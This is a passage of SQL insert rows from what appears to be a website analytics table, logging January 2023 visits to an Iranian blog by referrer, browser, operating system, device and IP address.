(27866,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','101.0.0.0','desktop','Unknown','','5.188.62.140','000',0,2,0),
(27867,'2023-01-17','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(27868,'2023-01-17','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','157.245.208.162','000',0,2,0),
(27869,'2023-01-18','http://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(27870,'2023-01-18','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','64.227.152.154','000',0,2,0),
(27871,'2023-01-18','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.159','000',0,2,0),
(27872,'2023-01-18','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,4,0),
(27873,'2023-01-18','http://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','1.15.233.119','000',0,4,0),
(27874,'2023-01-18','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','1.85.216.227','000',0,1,0),
(27875,'2023-01-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(27876,'2023-01-18','http://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','R9sk','','42.194.142.159','000',0,1,0),
(27877,'2023-01-18','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(27878,'2023-01-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(27879,'2023-01-18','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(27880,'2023-01-18','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.140.19','000',0,2,0),
(27881,'2023-01-18','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.212.90.42','000',0,2,0),
(27882,'2023-01-18','https://www.google.com/','Chrome','Linux','108.0.0.0','desktop','Unknown','','192.166.202.46','000',0,2,0),
(27883,'2023-01-18','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','213.46.252.136','000',0,1,0),
(27884,'2023-01-18','http://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','143.198.43.220','000',0,2,0),
(27885,'2023-01-18','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','171.253.138.86','000',0,1,0),
(27886,'2023-01-18','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.105','000',0,1,0),
(27887,'2023-01-18','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','5.165.48.72','000',0,4,0),
(27888,'2023-01-18','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.222.107.179','000',0,1,0),
(27889,'2023-01-18','http://45.92.94.221/blog/sitemap.xml','Chrome','OS X','62.0.0','desktop','Macintosh','','117.187.173.3','000',0,6,0),
(27890,'2023-01-18','http://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(27891,'2023-01-18','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(27892,'2023-01-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.123.152','000',0,1,0),
(27893,'2023-01-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.63.115.86','000',0,1,0),
(27894,'2023-01-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27895,'2023-01-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(27896,'2023-01-18','https://www.bing.com','Chrome','Windows','36.0.0.0','desktop','Unknown','','119.23.105.36','000',0,1,0),
(27897,'2023-01-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(27898,'2023-01-19','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','180.149.125.159','000',0,2,0),
(27899,'2023-01-19','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,3,0),
(27900,'2023-01-19','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27901,'2023-01-19','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(27902,'2023-01-19','http://ictbank.ir/blog','Chrome','Windows','12.0.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(27903,'2023-01-19','http://ictbank.ir/blog','Chrome','Windows','22.0.0.0','desktop','Unknown','','45.143.201.87','000',0,2,0),
(27904,'2023-01-19','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(27905,'2023-01-19','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','42.83.147.34','000',0,2,0),
(27906,'2023-01-19','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.96.243','000',0,2,0),
(27907,'2023-01-19','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','139.170.203.2','000',0,1,0),
(27908,'2023-01-19','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','182.32.29.69','000',0,1,0),
(27909,'2023-01-19','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','111.224.248.228','000',0,1,0),
(27910,'2023-01-19','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','223.166.22.164','000',0,1,0),
(27911,'2023-01-19','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(27912,'2023-01-19','http://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','5.238.215.177','000',0,1,0),
(27913,'2023-01-19','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','140.246.164.95','000',0,1,0),
(27914,'2023-01-19','http://ictbank.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','43.142.249.119','000',0,1,0),
(27915,'2023-01-19','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.199.102.235','000',0,1,0),
(27916,'2023-01-19','http://ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.128.29','000',0,1,0),
(27917,'2023-01-19','http://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','221.199.90.188','000',0,1,0),
(27918,'2023-01-19','http://ictbank.ir/blog','Chrome','Windows','69.0.0.0','desktop','Unknown','','221.199.88.210','000',0,1,0),
(27919,'2023-01-19','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','222.218.102.30','000',0,1,0),
(27920,'2023-01-19','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','27.227.187.26','000',0,1,0),
(27921,'2023-01-19','https://www.google.ru/','Yandex Browser','Windows','22.0.0.0','desktop','Unknown','','194.186.207.158','000',0,1,0),
(27922,'2023-01-19','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','105.113.29.248','000',0,1,0),
(27923,'2023-01-19','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27924,'2023-01-19','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.217.23.46','000',0,1,0),
(27925,'2023-01-19','http://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.76','000',0,2,0),
(27926,'2023-01-19','http://45.92.94.221:80/blog','Safari','OS X','9.0.0','desktop','Macintosh','','2.57.122.115','000',0,15,0),
(27927,'2023-01-19','http://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','23.106.28.196','000',0,1,0),
(27928,'2023-01-19','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','61.147.15.65','000',0,4,0),
(27929,'2023-01-19','http://ictbank.ir','Chrome','Windows','68.0.0.0','desktop','Unknown','','213.154.3.180','000',0,1,0),
(27930,'2023-01-19','http://design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','209.126.77.67','000',0,2,0),
(27931,'2023-01-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.124.61','000',0,1,0),
(27932,'2023-01-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27933,'2023-01-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(27934,'2023-01-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(27935,'2023-01-19','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','192.53.170.243','000',0,2,0),
(27936,'2023-01-19','http://www.design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','143.198.82.50','000',0,2,0),
(27937,'2023-01-19','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.90','000',0,2,0),
(27938,'2023-01-20','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,4,0),
(27939,'2023-01-20','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','188.250.162.14','000',0,2,0),
(27940,'2023-01-20','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','52.68.234.173','000',0,1,0),
(27941,'2023-01-20','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(27942,'2023-01-20','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','209.126.86.35','000',0,1,0),
(27943,'2023-01-20','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.197.213.245','000',0,1,0),
(27944,'2023-01-20','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(27945,'2023-01-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(27946,'2023-01-20','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','35.88.128.167','000',0,1,0),
(27947,'2023-01-20','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.23.242','000',0,2,0),
(27948,'2023-01-20','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.144.158.199','000',0,2,0),
(27949,'2023-01-20','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.108.9.38','000',0,2,0),
(27950,'2023-01-20','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.92.94.148','000',0,1,0),
(27951,'2023-01-20','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27952,'2023-01-20','http://ictbank.ir/blog','Chrome','Chrome OS','108.0.0.0','desktop','Unknown','','103.173.240.20','000',0,10,0),
(27953,'2023-01-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27954,'2023-01-20','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.222.254.253','000',0,2,0),
(27955,'2023-01-20','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.165.158.107','000',0,2,0),
(27956,'2023-01-20','https://www.google.com/','Chrome','Android','108.0.0.0','mobile:smart','Unknown','','152.57.241.169','000',0,2,0),
(27957,'2023-01-20','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,2,0),
(27958,'2023-01-20','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','47.104.68.94','000',0,1,0),
(27959,'2023-01-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27960,'2023-01-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,2,0),
(27961,'2023-01-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(27962,'2023-01-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.84.150.150','000',0,3,0),
(27963,'2023-01-20','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(27964,'2023-01-20','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,2,0),
(27965,'2023-01-20','http://ictbank.ir/blog','Chrome','Windows','57.0.0.0','desktop','Unknown','','3.82.143.152','000',0,2,0),
(27966,'2023-01-20','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','181.188.169.61','000',0,1,0),
(27967,'2023-01-21','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27968,'2023-01-21','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.80','000',0,4,0),
(27969,'2023-01-21','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(27970,'2023-01-21','http://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(27971,'2023-01-21','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(27972,'2023-01-21','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(27973,'2023-01-21','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(27974,'2023-01-21','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.142.236.41','000',0,2,0),
(27975,'2023-01-21','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.245.195.210','000',0,2,0),
(27976,'2023-01-21','http://wikisonnati.com/blog','Chrome','Windows','59.0.0.0','desktop','Unknown','','188.40.113.31','000',0,2,0),
(27977,'2023-01-21','https://www.google.com/search?','Chrome','Android','107.0.0.0','mobile:smart','Galaxy A20','','20.224.136.0','000',0,8,0),
(27978,'2023-01-21','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','143.198.100.72','000',0,1,0),
(27979,'2023-01-21','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','14.116.152.84','000',0,2,0),
(27980,'2023-01-21','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','18.246.61.150','000',0,1,0),
(27981,'2023-01-21','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.231.220','000',0,2,0),
(27982,'2023-01-21','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.87.31.142','000',0,2,0),
(27983,'2023-01-21','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(27984,'2023-01-21','http://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(27985,'2023-01-21','http://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,2,0),
(27986,'2023-01-21','http://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(27987,'2023-01-21','http://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.35.128','000',0,1,0),
(27988,'2023-01-21','http://wikisonnati.com/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.51.222','000',0,2,0),
(27989,'2023-01-21','http://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(27990,'2023-01-21','http://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,2,0),
(27991,'2023-01-21','http://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,1,0),
(27992,'2023-01-21','http://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','31.31.65.148','000',0,2,0),
(27993,'2023-01-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(27994,'2023-01-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(27995,'2023-01-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.113','000',0,1,0),
(27996,'2023-01-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,1,0),
(27997,'2023-01-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(27998,'2023-01-21','http://wikisonnati.com/blog/','Edge','Windows','90.0.0.0','desktop','Unknown','','109.106.137.188','000',0,2,0),
(27999,'2023-01-22','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,3,0),
(28000,'2023-01-22','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.54','000',0,1,0),
(28001,'2023-01-22','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,4,0),
(28002,'2023-01-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,2,0),
(28003,'2023-01-22','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(28004,'2023-01-22','http://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.75','000',0,2,0),
(28005,'2023-01-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(28006,'2023-01-22','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(28007,'2023-01-22','http://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,2,0),
(28008,'2023-01-22','http://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.231','000',0,2,0),
(28009,'2023-01-22','http://neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,2,0),
(28010,'2023-01-22','http://wikisonnati.com/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(28011,'2023-01-22','http://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,2,0),
(28012,'2023-01-22','http://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.41.193','000',0,1,0),
(28013,'2023-01-22','http://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(28014,'2023-01-22','http://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,1,0),
(28015,'2023-01-22','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(28016,'2023-01-22','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,2,0),
(28017,'2023-01-22','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','182.43.148.98','000',0,1,0),
(28018,'2023-01-22','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','112.135.80.4','000',0,1,0),
(28019,'2023-01-22','http://www.ictbank.ir/blog','Firefox','Windows','108.0','desktop','Unknown','','137.74.24.99','000',0,2,0),
(28020,'2023-01-22','http://design-arena.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S20 FE','','192.71.36.158','000',0,2,0),
(28021,'2023-01-22','http://45.92.94.221/blog','Chrome','Linux','44.0.0.0','desktop','Unknown','','134.122.52.206','000',0,2,0),
(28022,'2023-01-22','http://neginghavami.ir/blog/','Kinza','Windows','4.0.0','desktop','Unknown','','151.106.12.243','000',0,3,0),
(28023,'2023-01-22','http://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','118.193.72.185','000',0,3,0),
(28024,'2023-01-22','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.19.31','000',0,1,0),
(28025,'2023-01-22','http://ictbank.ir/blog','Firefox','Windows','74.0','desktop','Unknown','','194.116.162.200','000',0,1,0),
(28026,'2023-01-22','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.209.185.133','000',0,2,0),
(28027,'2023-01-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,1,0),
(28028,'2023-01-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.228','000',0,1,0),
(28029,'2023-01-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(28030,'2023-01-22','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(28031,'2023-01-22','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,4,0),
(28032,'2023-01-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(28033,'2023-01-23','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(28034,'2023-01-23','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.170','000',0,2,0),
(28035,'2023-01-23','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(28036,'2023-01-23','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(28037,'2023-01-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(28038,'2023-01-23','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','84.10.62.78','000',0,4,0),
(28039,'2023-01-23','http://ictbank.ir/blog','Chrome','Linux','109.0.0.0','desktop','Unknown','','45.238.182.177','000',0,2,0),
(28040,'2023-01-23','http://ictbank.ir/blog','Chrome','OS X','53.0.0.0','desktop','Macintosh','','60.191.125.35','000',0,1,0),
(28041,'2023-01-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,2,0),
(28042,'2023-01-23','http://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','112.135.78.179','000',0,2,0),
(28043,'2023-01-23','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','78.38.242.3','000',0,1,0),
(28044,'2023-01-23','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(28045,'2023-01-23','http://ictbank.ir/blog','Chrome','OS X','47.0.0.0','desktop','Macintosh','','61.147.15.65','000',0,2,0),
(28046,'2023-01-23','http://wikisonnati.com/blog','Unknown','Android','Unknown','tablet','Unknown','','192.71.36.158','000',0,1,0),
(28047,'2023-01-23','http://wikisonnati.com/blog/','Unknown','Android','Unknown','tablet','Unknown','','192.71.224.240','000',0,1,0),
(28048,'2023-01-23','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','5.78.71.48','000',0,4,0),
(28049,'2023-01-23','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','182.43.148.98','000',0,1,0),
(28050,'2023-01-23','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','152.230.128.62','000',0,3,0),
(28051,'2023-01-23','http://ictbank.ir/blog','Firefox','Ubuntu','81.0','desktop','Unknown','','178.63.66.151','000',0,2,0),
(28052,'2023-01-23','http://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(28053,'2023-01-23','https://www.google.com/','Chrome','Windows','109.0.0.0','desktop','Unknown','','165.225.92.179','000',0,1,0),
(28054,'2023-01-23','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.201.36.54','000',0,1,0),
(28055,'2023-01-23','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.165.204.23','000',0,2,0),
(28056,'2023-01-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,4,0),
(28057,'2023-01-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.124.61','000',0,1,0),
(28058,'2023-01-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,2,0),
(28059,'2023-01-23','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(28060,'2023-01-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(28061,'2023-01-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(28062,'2023-01-23','https://www.google.com/','Firefox','OS X','109.0','desktop','Macintosh','','92.154.87.8','000',0,1,0),
(28063,'2023-01-23','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','159.89.192.232','000',0,1,0),
(28064,'2023-01-24','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(28065,'2023-01-24','http://www.neginghavami.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','15.235.12.96','000',0,4,0),
(28066,'2023-01-24','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,7,0),
(28067,'2023-01-24','http://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.100','000',0,1,0),
(28068,'2023-01-24','http://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.96','000',0,1,0),
(28069,'2023-01-24','http://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.53.138','000',0,2,0),
(28070,'2023-01-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(28071,'2023-01-24','http://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(28072,'2023-01-24','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(28073,'2023-01-24','https://www.google.com/','Chrome','OS X','109.0.0.0','desktop','Macintosh','','122.161.79.81','000',0,1,0),
(28074,'2023-01-24','http://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','35.161.230.125','000',0,2,0),
(28075,'2023-01-24','https://www.google.com/','Firefox','Windows','110.0','desktop','Unknown','','102.115.227.13','000',0,1,0),
(28076,'2023-01-24','http://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','44.234.24.220','000',0,1,0),
(28077,'2023-01-24','http://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','5.78.71.48','000',0,2,0),
(28078,'2023-01-24','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.187.236.33','000',0,2,0),
(28079,'2023-01-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(28080,'2023-01-24','http://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','217.182.192.90','000',0,2,0),
(28081,'2023-01-24','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.108.9.38','000',0,1,0),
(28082,'2023-01-24','http://ictbank.ir/blog','Chrome','OS X','26.0.0.0','desktop','Macintosh','','34.222.187.210','000',0,2,0),
(28083,'2023-01-24','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(28084,'2023-01-24','https://www.google.com/search?','Chrome','OS X','107.0.0.0','desktop','Macintosh','','20.21.246.0','000',0,8,0),
